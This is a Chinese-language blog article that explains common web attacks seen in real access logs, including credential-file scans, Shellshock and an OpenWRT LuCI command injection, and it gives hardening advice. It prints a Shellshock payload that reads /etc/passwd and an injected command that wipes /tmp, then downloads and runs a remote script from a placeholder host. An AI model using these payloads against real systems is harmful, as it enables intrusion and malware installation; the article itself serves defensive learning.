访问日志分析实例：从中学习网络攻击的手段

2024-03-25 00:01:50

互联网满是流矢暗箭。一旦一个公有IP暴露到公网马上就会大量的恶意地址扫描、尝试、攻击和渗透。所以暴露再公网之前确保你主机上任何危险的端口（22，873，1433，1521，1521，2375，3306，3389，5423，6379，27017，271018）。当然除了安全加固和防护之外，需要学习一些攻击的套路对我们做好安全也是很有必要的。所以本文虫虫给大家介绍一下如何通过访问日志来学习网络攻击的套路（所有的日志均来自线上Web服务器的访问日志）。

凭证和配置发现

针对公网网站最常见的攻击（扫描）是搜索凭证的目录遍历攻击。其中最主要的似乎是寻找.env，可以由该文件直接发现一些配置机密信息，比如凭据和密码、后端数据库IP、目录等。

攻击者还会扫描其他可能的包含密码等的文件，比如AWS凭证和配置文件（aws.yml），以及.git/config仓库配置信息。

以及其他可能的公共目录扫描。

经验教训：屏蔽一下对外公开的文件和目录，最低限度的显示对外透露的信息，包括代码注释，js配置信息可以考虑进行代码混淆和加密。对必须公开工具或目录，可以考虑添加一些身份验证，并限制对特定IP地址的访问。

shellshock攻击

利用Shellshock漏洞的攻击也常见，比如一下日志：

该漏洞利用使用有漏洞版本的bash执行CGI脚本的Web服务器（虽然CGI的Web现在已经绝迹了），该漏洞可以进行远程代码执行，攻击者可以用它执行任意命令。当CGI程序启动时，它会根据请求的内容设置环境变量，值得注意的是 HTTP_USER_AGENT内容中包含“() { :; }; ”内容时，bash会将其解释为需要执行的函数。

分析上述日志，在这次特定的攻击中，攻击者通过发出GET访问，其USER_AGENT字段包含：

() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd

其中 () { ignored; };部分定义了Bash函数。大括号内的内容是函数体。被忽略的命令是一个占位符；它不会影响执行，为了防止语法错误导致执行的中断。

echo Content-Type: text/html; echo ;：这些命令是函数体的一部分。他们将HTTP响应的Content-Type标头设置为“text/html”并回显空行。

/bin/cat /etc/passwd：这是函数中嵌入的恶意命令。它尝试使用cat命令显示内容/etc/passwd文件，其中包含用户帐户信息。

如果攻击成功，理论上攻击者将获得对/etc/passwd的信息，并拥有在服务器上执行任意代码的机制。

与目录遍历攻击一样，攻击者猜测常见目录和路径：

注入攻击

LuCI注入

也有一些攻击时针对特定的目标，比如下面的日志显示攻击目标为OpenWRT路由器的LuCI Web。该攻击尝试将命令注入表单的国家/地区字段，该表单下载并执行托管远程服务器的 hell脚本。

恶意代码位于经过URL编码的URL中。对URL进行解码结果：

/cgi-bin/luci/;stok=/locale：LuC界面中CGI脚本的路径。LuCI是一个基于 Web的界面，适用于OpenWRT路由器和类似的嵌入式设备。

?form=country&operation=write&country=：这些是传递给CGI脚本的参数。

$(cd /tmp; rm -rf *; wget xxx.xxx.xxx/tenda.sh; chmod 777 tenda.sh;./tenda.sh)：这是一个用执行的bash替换命令，并将输出替换到 URL 中。该命令正在尝试cd进入/tmp文件夹，删除所有文件，从远程服务器下载shell脚本并执行。

下载该脚本进行进一步调查，目标文件是一个恶意的二进制文件（并非shell脚本）。